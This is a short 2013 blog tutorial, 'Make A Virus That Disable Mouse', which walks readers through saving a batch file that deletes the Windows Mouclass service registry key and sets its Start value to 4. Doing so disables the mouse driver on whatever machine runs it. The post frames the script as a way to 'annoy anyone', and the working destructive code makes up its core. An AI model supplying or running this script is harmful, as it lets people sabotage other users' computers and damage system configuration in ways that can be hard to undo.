Tuesday 23 July 2013

Make A Virus That Disable Mouse

 Hello friends Today i am going to show you very intrusting tutorial that how to disable mouse with notepad virus. With this virus you can easily annoy anyone :D . I Have also posted a Tutorial on how to make a notepad virus. Now today its process is totally same as the older one but its bit different from them and its more funny and dangerous.

So lets start this tutorial...



  1. Go to your desktop or any Folder.
  2. Make a new taxt document there.
  3. Copy and Paste the following code in it.
  4. click save as
  5. rename it to virus.bat 
  6. Save it.
  Its done. 

CODE:-

rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------


Note:- you can rename it anything but its extension must be .bat .

No comments:

Post a Comment